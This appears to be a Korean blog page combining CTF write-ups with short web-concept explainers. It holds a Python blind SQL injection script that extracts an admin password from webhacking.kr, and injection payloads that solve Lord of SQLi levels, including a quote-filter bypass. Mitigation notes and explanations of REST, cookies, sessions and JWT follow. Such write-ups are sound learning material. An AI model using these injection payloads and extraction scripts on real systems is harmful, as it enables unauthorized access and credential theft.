https://webhacking.kr/

아무 값을 입력하니 login fail이 뜬다.

webhacking.kr/challenge/bonus-1/index.php?id=asd&pw=asd

url로 값을 전달하는 것을 보아 ID와 PW 모두 get방식으로 전달 받는다.

ID와 PW에 guest를 입력하니 login success가 뜬다.

쿼리문이 성립 되면(참이면) wrong password가 뜨는 것 같다.

ID는 admin으로 확정 짓고, admin의 pw를 알아내야한다. pw의 길이와 문자열을 알아내야한다.

위의 코드를 돌리면 length가 36임을 알 수 있다.

import requests

url='https://webhacking.kr/challenge/bonus-1/index.php?id=admin&'
header={'Cookie':'PHPSESSID=sqge4qh5haviq2cdvg6hj6claf'}

pw=""
for i in range(1,37):
    for j in range(33,127):
        query = "pw='+or+ascii(substr(pw,{},1))={}+%23".format(i,j)
        result = requests.get(url+query, headers = header)
        if "wrong password" in result.text:
            print("pw:" ,pw)
            pw += chr(j)
            break

print(pw)

pw의 길이만큼 반복하며 문자열을 알아내는 코드이다.

ghere_is_no_rest_for_the_white_angel 라는 값이 나왔는데, g를 t로 바꾸면 될 것 같다.

Solve!

참고

https://jacksimon86.tistory.com/74

https://los.rubiya.kr

1. Gremlin

if($result['id']) solve("gremlin");  >>>  id 값이 있으면 문제가 풀린다.

id 값이 있기만 하면 되기 때문에 아무 값을 넣고 pw를 ' 로 닫아준 후 SQLI 구문 'or 1=1'로 pw가 무조건 참이도록 만들면 된다. 그리고 %23(#)로 뒷 부분을 모두 주석처리 해주면 해결된다.

?id=123&pw=' or 1=1 %23

Clear!!!

2. Cobolt

if($result['id'] == 'admin') solve("cobolt"); >>> id값이 admin이면 풀리는 문제이다.

첫 번째 방법은 id값에 admin을 넣고 뒷 부분을 모두 주석처리하면 풀린다.

?id=admin'%23

두 번째 방법은 pw값을 md5로 인코딩 하지만 AND조건으로 pw조건을 우회하는 방법이다.

?id=admin'or'1=1

Clear!!!

3. Goblin

if($result['id'] == 'admin') solve("goblin"); >>> id 값이 admin이면 풀린다.

if(preg_match('/\'|\"|\`/i', $_GET[no])) exit("No Quotes ~_~"); >>> preg_match 정규표현식 검사 함수로 인해서 '와 "가 필터링 된다.

그러므로 'admin'을 사용하지 못하기 때문에 Binary 또는 Hex 인코딩으로 admin을 인코딩하여 삽입하면 된다.

no에 1을 넣으면 guest가 나온다. guest가 나오지 않도록 no에 1이 아닌 값을 집어넣는다. 실전에서는 터무니 없는 값을 주면 좋을 것 같다. 그 후 or id = 'admin'을 해주면 풀린다.

admin을 Hex값으로 인코딩하면

0x61646d696e이므로

?no=10 or id=0x61646d696e

Clear!!!

취약점에 대한 해결 방안...

1. 입력값 검증을 더 강력히 한다.

2. prepared statement를 적용한다.

3. 저장 프로시저 사용

사용하고자 하는 Query 에 미리 형식을 지정하는 것을 말한다. 지정된 형식의 데이터가 아니면 Query 가 실행되지 않기 때문에 보안성을 크게 향상시킨다.

REST는 Representational State Transfer의 약자로 WWW과 같은 분산 하이퍼미디어 시스템을 위한 소프트웨어 아키텍처의 한 형식이다. 자원을 이름(자원의 표현)으로 구분하여 해당 자원의 상태(정보)를 주고 받는 모든 것을 의미한다.

API란 Application Programming Interface의 약자로 데이터와 기능의 집합을 제공하여 컴퓨터 프로그램간 상호작용을 촉진하며, 서로 정보를 교환가능 하도록 하는 것을 의미한다.

REST API의 정의는 REST 기반으로 서비스 API를 구현한 것이다.

https://gmlwjd9405.github.io/2018/09/21/rest-and-restful.html

https://hoyeonkim795.github.io/posts/rest_api/

 웹 서핑을 하다보면 사이트에 접속 했을 때 쿠키를 accept하라거나 세션이 만료되었다는 문구를 종종 볼 수 있다. 쿠키, 세션, 세션/쿠키, jwt가 무엇이고, 공통점과 차이점을 알아보자. 

 HTTP는 클라이언트가 요청을 한 후 응답을 받으면 연결을 끊고(Connectionless), 통신이 끝나면 상태를 유지하지 않는(Stateless) 성질을 갖고있다. 이러한 특징 때문에 쿠키나 세션을 이용하여 사용자에 대한 정보를 유지할 수 있다. 

 예를 들어 설명하자면 로그인 상태, 장바구니, 게임 스코어를 유지하는 기능이나, 메인 페이지에서 로그인을 한 후 다른 페이지로 넘어가서 또 다시 로그인을 해야할 필요 없는 것, 사이트에서의 개인 세팅을 저장하는 것이 이에 해당된다.

쿠키(Cookie)란 무엇인가?

• HTTP의 일종으로 사용자가 어떠한 웹 사이트를 방문할 경우, 그 사이트가 사용하고 있는 서버에서 사용자의 컴퓨터에 저장하는 작은 기록 정보 파일이다. HTTP에서 클라이언트의 상태 정보를 클라이언트의 PC에 저장하였다가 필요시 정보를 참조하거나 재사용할 수 있다.
• 쿠키 특징: 
  1. 이름, 값, 만료일(저장 기간 설정), 경로 정보로 구성되어 있다.
  2. 클라이언트에 총 300개의 쿠키를 저장할 수 있다.
  3. 하나의 도메인 당 20개의 쿠키를 가질 수 있다.
  4. 하나의 쿠키는 4KB(=4096byte)까지 저장 가능하다.
  5. 맛있다.

• 쿠키의 동작 순서
  1. 클라이언트가 페이지를 요청한다. (사용자가 웹사이트 접근)
  2. 웹 서버는 쿠키를 생성한다.
  3. 생성한 쿠키에 정보를 담아 HTTP 화면을 돌려줄 때, 같이 클라이언트에게 돌려준다.
  4. 넘겨 받은 쿠키는 클라이언트가 가지고 있다가(로컬 PC에 저장) 다시 서버에 요청할 때 요청과 함께 쿠키를 전송한다.
  5. 동일 사이트 재방문시 클라이언트의 PC에 해당 쿠키가 있는 경우, 요청 페이지와 함께 쿠키를 전송한다.

• 사용 예시
  1. 방문했던 사이트에 다시 방문 하였을 때 아이디와 비밀번호 자동 입력
  2. 팝업창을 통해 "오늘 이 창을 다시 보지 않기" 체크

세션(Session)이란 무엇인가?

• 일정 시간동안 같은 사용자(브라우저)로부터 들어오는 일련의 요구를 하나의 상태로 보고, 그 상태를 일정하게 유지시키는 기술이다. 여기서 일정 시간은 방문자가 웹 브라우저를 통해 웹 서버에 접속한 시점으로부터 웹 브라우저를 종료하여 연결을 끝내는 시점을 말한다. 즉, 방문자가 웹 서버에 접속해 있는 상태를 하나의 단위로 보고 그것을 세션이라고 한다.

• 세션 특징: 
  1. 웹 서버에 웹 컨테이너의 상태를 유지하기 위한 정보를 저장한다.
  2. 웹 서버의 저장되는 쿠키(=세션 쿠키)
  3. 브라우저를 닫거나, 서버에서 세션을 삭제했을때만 삭제가 되므로, 쿠키보다 비교적 보안이 좋다.
  4. 저장 데이터에 제한이 없다.
  5. 각 클라이언트 고유 Session ID를 부여한다. Session ID로 클라이언트를 구분하여 각 클라이언트 요구에 맞는 서비스 제공.
  
• 세션의 동작 순서
  1. 클라이언트가 페이지를 요청한다. (사용자가 웹사이트 접근)
  2. 서버는 접근한 클라이언트의 Request-Header 필드인 Cookie를 확인하여, 클라이언트가 해당 session-id를 보냈는지 확인한다.
  3. session-id가 존재하지 않는다면, 서버는 session-id를 생성해 클라이언트에게 돌려준다.
  4. 서버에서 클라이언트로 돌려준 session-id를 쿠키를 사용해 서버에 저장한다. 쿠키 이름 : JSESSIONID
  5. 클라이언트는 재접속 시, 이 쿠키(JSESSIONID)를 이용하여 session-id 값을 서버에 전달

• 사용 예시
  1. 화면이 이동해도 로그인이 풀리지 않고 로그아웃하기 전까지 유지

쿠키와 세션 공통점

• 웹 통신간 유지하려는 정보를 저장하기 위해 사용된다.

쿠키와 세션 차이점

세션 쿠키란 무엇인가?

• 쿠키의 종류중 하나로, 클라이언트와 웹서버의 활성화된 연결을 의미함. 로그오프 하거나 브라우저를 닫으면 만료된다.

JWT란 무엇인가?

• JSON Web Token의 약자로, 클라이언트와 서버 통신시 권한 인가를 위해 사용하는 Json 형태의 토큰이다. 웹서버의 경우에는 http나 url 헤더에 넣어서 전달하는게 가능하고, 세션 방식처럼 토큰 자체를 쿠키에 담아서 보낼 수 있으며 토큰은 비공개 서명 및 암호화를 사용하여 만들기 때문에 정보를 안전성 있게 전달 해준다.  또한 c, python, java 등 많은 프로그래밍 언어에서 범용적으로 지원한다.
• JWT 구조:
  (AAAA.BBBB.CCCC)와 같이.을 구분자로 세 구역으로 나누어져 있다.
  
  1. Header: 토큰 타입과 해싱 알고리즘을 지정함.
  2. Payload: 토큰에 담을 정보가 들어가 있음.
  3. Signature: 헤더의 인코딩 값과, 정보의 인코딩 값을 합친 후 비밀키로 해쉬하여 생성함
  
• 토큰 동작 방식
  1. 사용자가 id, password을 입력하여 로그인
  2. 서버가 요청을 확인하고 비밀키를 통해 접근 토큰 지급
  3. 서버가 클라이언트에게  JWT 전달
  4. 클라이언트가 서비스 요청과 권한을 확인하기 위해 헤더에 JWT 전달
  5. JWT 서명을 체크하고 JWT에서 사용자 정보를 확인
  6. 클라이언트 요청에 대한 응답 전달

-참고 자료 출처-

https://hahahoho5915.tistory.com/32

https://velog.io/@namezin/Cookie

https://nesoy.github.io/articles/2017-03/Session-Cookie

https://interconnection.tistory.com/74

https://raar.tistory.com/48